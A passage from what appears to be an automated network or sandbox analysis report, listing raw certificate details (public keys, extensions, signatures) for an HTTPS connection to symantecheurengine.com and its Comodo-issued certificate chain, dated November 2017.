http://crl.comodoca.com/cPanelIncCertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.52][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1D 68 74 74 70 73 3A 2F 2F 73 65 63 75 72 65 ..https://secure0010: 2E 63 6F 6D 6F 64 6F 2E 63 6F 6D 2F 43 50 53 .comodo.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][8]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: symantecheurengine.com DNSName: cpanel.symantecheurengine.com DNSName: mail.symantecheurengine.com DNSName: webdisk.symantecheurengine.com DNSName: webmail.symantecheurengine.com DNSName: www.symantecheurengine.com][9]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A C1 FA 10 4B 8F 53 3F D8 F0 B8 19 7F DF 95 48 Z...K.S?.......H0010: BF 9E 6B 34 ..k4]]] Algorithm: [SHA256withRSA] Signature:0000: 81 C3 9C 5D 09 AB 69 90 BC AB 32 01 9C C4 6C 71 ...]..i...2...lq0010: DE 12 40 13 B2 9A 6B 03 FD 31 A2 E2 13 58 05 81 ..@...k..1...X..0020: 31 AD 13 79 6E 24 64 D6 B0 02 8D 1F 67 F3 BF EA 1..yn$d.....g...0030: 6A 80 41 42 41 14 71 90 47 7E 61 FB CB 1D A4 8D j.ABA.q.G.a.....0040: 62 3F 2A E8 BF 60 3B 78 AC 34 16 73 71 96 F7 4C b?*..`;x.4.sq..L0050: F7 3E 8D 88 FA 97 3D FC C5 BB 01 AC 33 7A DA 57 .>....=.....3z.W0060: 85 93 2C AA 68 D8 DB FA AC 50 F1 BA 0E 20 56 3F ..,.h....P... V?0070: 68 46 B8 6C 9C 66 34 9D 1D 6E 69 20 AA 6A 40 71 hF.l.f4..ni .j@q0080: 4E 70 7A F2 7C FD 7E AE 92 73 F6 CC 07 BB AC 5A Npz......s.....Z0090: ED FB 7D AB 8E 2D 4A 5A 61 EA 07 C1 38 FB A7 89 .....-JZa...8...00A0: 9F 98 C0 56 DC 1E 50 DF D3 F3 AD 07 D6 DF 9A AC ...V..P.........00B0: 57 95 6A 87 06 FD E9 90 37 A3 12 27 05 86 F1 8C W.j.....7..'....00C0: 22 8C C6 A8 40 57 F1 8B FC BA 10 AC 8E 33 40 98 "...@W.......3@.00D0: A9 CE 2F B6 79 BA F7 79 4C EE 99 CF BE 60 79 13 ../.y..yL....`y.00E0: 26 B3 EB F3 3F C8 C7 A5 B4 D2 FC 96 55 BA B4 34 &...?.......U..400F0: B2 0D 23 22 B5 D8 5B F6 8A 2C E1 5A A6 79 70 54 ..#"..[..,.Z.ypT]
Nov 21, 2017 13:09:56.656483889 MEZ4434920366.70.246.5192.168.0.50CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025[[ Version: V3 Subject: CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 2048 bits modulus: 17593480096692713018475895792724075672946153458286563199571628462555198211400353729234678888933040074245743031344110676950225602424239744275580203032388253183641969115414246814221235053912886357650730438318219217508801010315710974463129067389616293028896205864799170095066829527213637069580537424209085616377394665471565050487092639050216078240279738840070252322854082656970094321515205244683618000265664081313419509307371923479181139989769749253107567251365335361691390702907845356758548602034458245938667693881170016372773160251025347753244451417413595842348278925917111831860996925937874910597825547509003460806507 public exponent: 65537 Validity: [From: Mon May 18 02:00:00 CEST 2015, To: Sun May 18 01:59:59 CEST 2025] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ f01d4bee 7b7ca37b 3c0566ac 05972458]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: caIssuers accessLocation: URIName: http://crt.comodoca.com/COMODORSAAddTrustCA.crt, accessMethod: ocsp accessLocation: URIName: http://ocsp.comodoca.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.comodoca.com/COMODORSACertificationAuthority.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [1.3.6.1.4.1.6449.1.2.2.52][] ] [CertificatePolicyId: [2.23.140.1.2.1][] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 7E 03 5A 65 41 6B A7 7E 0A E1 B8 9D 08 EA 1D 8E ..ZeAk..........0010: 1D 6A C7 65 .j.e]]] Algorithm: [SHA384withRSA] Signature:0000: 10 9F A0 60 08 81 74 A1 A0 84 78 60 4C 39 39 DA ...`..t...x`L99.0010: 64 77 EF 19 0A 72 39 23 94 3B 91 7D 7F 34 8B 97 dw...r9#.;...4..0020: 58 4E 59 0A 2D 68 C3 10 42 B0 A0 7A 81 8C 7B AB XNY.-h..B..z....0030: 31 32 20 39 E4 22 73 E0 DE C9 17 5D 83 C5 75 2D 12 9."s....]..u-0040: E1 11 47 59 01 9E 5D C0 F4 DD 12 6A D0 6D 30 20 ..GY..]....j.m0 0050: E8 B3 CA 4F DF 9A E0 A7 17 9F 1A 2F 87 7E EB 50 ...O......./...P0060: E1 53 F3 F8 47 D9 8C 60 F2 C9 65 65 9C F0 DA 01 .S..G..`..ee....0070: E6 B2 F2 D8 07 98 87 DF 37 89 98 55 12 42 C9 E4 ........7..U.B..0080: 2D DE 2D BE AA 64 94 4E D9 2E E6 C2 D5 F2 C0 E6 -.-..d.N........0090: E9 EA 19 3E 37 0B 89 5F C9 3A F8 4F 47 40 3E AF ...>7.._.:.OG@>.00A0: 1A 7F A2 F6 85 01 88 17 36 B5 23 EA B9 FE BA 6B ........6.#....k00B0: 48 0B 02 20 39 AE C3 61 EB 95 A5 A1 73 C7 1C 5F H.. 9..a....s.._00C0: 54 33 73 57 4B 36 8B 9B 5B 28 E3 3E B1 0B 78 5C T3sWK6..[(.>..x\00D0: 6B 14 A7 10 CC E5 DA 3F BA E9 D6 B2 2D 1D 70 54 k......?....-.pT00E0: BA 5E AB 7D 4F 29 89 10 E0 3A 90 04 C5 EE B9 8E .^..O)...:......00F0: 43 A2 E3 63 58 7F 49 8B 71 3E 57 62 23 40 D1 5D C..cX.I.q>Wb#@.]0100: 96 64 22 61 56 9F 96 67 47 87 BC E5 00 20 A4 68 .d"aV..gG.... .h0110: E2 C1 A0 81 7B 68 73 08 C4 6D 4E 70 79 E8 DD 55 .....hs..mNpy..U0120: D7 09 5C B9 9D 0A 95 A6 0C D9 DB E2 8A 55 EB B9 ..\..........U..0130: E1 E7 9A 95 14 4C 58 06 41 C1 10 AA AA B1 3A E2 .....LX.A.....:.0140: A5 4A 4A E0 D9 C9 1F C2 A0 97 BB 06 EF 19 00 DB .JJ.............0150: 02 BE 96 F1 FB 54 8F 93 9A FA 30 22 36 A9 77 26 .....T....0"6.w&0160: 1F 94 28 93 E9 13 3D 45 D1 3A 35 48 1E 98 0D 82 ..(...=E.:5H....0170: 70 C0 0B 5A 28 87 A1 78 51 3F B5 A7 5C A6 91 22 p..Z(..xQ?..\.."0180: 00 42 4C B9 80 15 80 2A B1 2D 89 4F F7 BA 1E 18 .BL....*.-.O....0190: C4 8C 59 1E 73 49 A3 A8 7B BC 1F F7 56 4D 50 9F ..Y.sI......VMP.01A0: 67 16 A7 C7 17 48 E7 6D 54 57 76 6E 97 58 5B 78 g....H.mTWvn.X[x01B0: 64 A4 ED 62 B4 00 3B 06 7E 79 B8 58 5F 6E 84 D6 d..b..;..y.X_n..01C0: 43 BC 4F DB 39 AA 28 F0 C1 89 09 C5 FB E3 18 44 C.O.9.(........D01D0: B7 E5 B2 8B 5D 95 F9 23 5A 0B 72 F7 69 3A D6 57 ....]..#Z.r.i:.W01E0: 8B E1 E9 F4 60 BE C4 51 2B 11 AC FE 48 B3 72 73 ....`..Q+...H.rs01F0: CA 13 50 73 0D 04 76 CA 01 E1 42 C2 D7 21 CF F9 ..Ps..v...B..!..]
Nov 21, 2017 13:09:56.656483889 MEZ4434920366.70.246.5192.168.0.50CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue Jan 19 01:00:00 CET 2010, To: Tue Jan 19 00:59:59 CET 2038] Issuer: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB SerialNumber: [ 4caaf9ca db636fe0 1ff74ed8 5b03869d]Certificate Extensions: 3[1]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][2]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ Key_CertSign Crl_Sign][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 0A F1 D5 46 84 B7 AE 51 BB 6C B2 4D 41 14 00 93 ...F...Q.l.MA...0010: 4C 9C CB E5 C0 54 CF A0 25 8E 02 F9 FD B0 A2 0D L....T..%.......0020: F5 20 98 3C 13 2D AC 56 A2 B0 D6 7E 11 92 E9 2E . .<.-.V........0030: BA 9E 2E 9A 72 B1 BD 19 44 6C 61 35 A2 9A B4 16 ....r...Dla5....0040: 12 69 5A 8C E1 D7 3E A4 1A E8 2F 03 F4 AE 61 1D .iZ...>.../...a.0050: 10 1B 2A A4 8B 7A C5 FE 05 A6 E1 C0 D6 C8 FE 9E ..*..z..........0060: AE 8F 2B BA 3D 99 F8 D8 73 09 58 46 6E A6 9C F4 ..+.=...s.XFn...0070: D7 27 D3 95 DA 37 83 72 1C D3 73 E0 A2 47 99 03 .'...7.r..s..G..0080: 38 5D D5 49 79 00 29 1C C7 EC 9B 20 1C 07 24 69 8].Iy.).... ..$i0090: 57 78 B2 39 FC 3A 84 A0 B5 9C 7C 8D BF 2E 93 62 Wx.9.:.........b00A0: 27 B7 39 DA 17 18 AE BD 3C 09 68 FF 84 9B 3C D5 '.9.....<.h...<.00B0: D6 0B 03 E3 57 9E 14 F7 D1 EB 4F C8 BD 87 23 B7 ....W.....O...#.00C0: B6 49 43 79 85 5C BA EB 92 0B A1 C6 E8 68 A8 4C .ICy.\.......h.L00D0: 16 B1 1A 99 0A E8 53 2C 92 BB A1 09 18 75 0C 65 ......S,.....u.e00E0: A8 7B CB 23 B7 1A C2 28 85 C3 1B FF D0 2B 62 EF ...#...(.....+b.00F0: A4 7B 09 91 98 67 8C 14 01 CD 68 06 6A 63 21 75 .....g....h.jc!u0100: 03 80 88 8A 6E 81 C6 85 F2 A9 A4 2D E7 F4 A5 24 ....n......-...$0110: 10 47 83 CA CD F4 8D 79 58 B1 06 9B E7 1A 2A D9 .G.....yX.....*.0120: 9D 01 D7 94 7D ED 03 4A CA F0 DB E8 A9 01 3E F5 .......J......>.0130: 56 99 C9 1E 8E 49 3D BB E5 09 B9 E0 4F 49 92 3D V....I=.....OI.=0140: 16 82 40 CC CC 59 C6 E6 3A ED 12 2E 69 3C 6C 95 ..@..Y..:...i<l.0150: B1 FD AA 1D 7B 7F 86 BE 1E 0E 32 46 FB FB 13 8F ..........2F....0160: 75 7F 4C 8B 4B 46 63 FE 00 34 40 70 C1 C3 B9 A1 u.L.KFc..4@p....0170: DD A6 70 E2 04 B3 41 BC E9 80 91 EA 64 9C 7A E1 ..p...A.....d.z.0180: 22 03 A9 9C 6E 6F 0E 65 4F 6C 87 87 5E F3 6E A0 "...no.eOl..^.n.0190: F9 75 A5 9B 40 E8 53 B2 27 9D 4A B9 C0 77 21 8D .u..@.S.'.J..w!.01A0: FF 87 F2 DE BC 8C EF 17 DF B7 49 0B D1 F2 6E 30 ..........I...n001B0: 0B 1A 0E 4E 76 ED 11 FC F5 E9 56 B2 7D BF C7 6D ...Nv.....V....m01C0: 0A 93 8C A5 D0 C0 B6 1D BE 3A 4E 94 A2 D7 6E 6C .........:N...nl01D0: 0B C2 8A 7C FA 20 F3 C4 E4 E5 CD 0D A8 CB 91 92 ..... ..........01E0: B1 7C 85 EC B5 14 69 66 0E 82 E7 CD CE C8 2D A6 ......if......-.01F0: 51 7F 21 C1 35 53 85 06 4A 5D 9F AD BB 1B 5F 74 Q.!.5S..J]...._t]

System Behavior